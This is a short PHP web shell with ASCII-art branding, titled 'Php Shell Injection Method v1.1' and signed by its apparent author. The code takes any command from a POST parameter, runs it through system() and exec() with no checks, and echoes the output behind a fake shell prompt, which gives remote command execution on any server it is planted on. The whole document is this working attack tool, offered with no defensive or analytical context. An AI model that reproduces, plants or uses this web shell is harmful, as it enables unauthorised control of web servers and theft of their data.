_____ _____
__ /\___ \/\ __`\
/\_\\/__/\ \ \ \/\ \ ___
\/\ \ _\ \ \ \ \ \ \ / __`\
\ \ \/\ \_\ \ \ \_\ \/\ \L\ \
\ \_\ \____/\ \_____\ \____/
\/_/\/___/ \/_____/\/___/
Php Shell Injection Method v1.1
$cmd = $_POST['cmd'];
echo "sh-2.05b$ $cmd
" ;
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
exec("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
echo "
sh-2.05b$ "
?>
TouCh By iJOo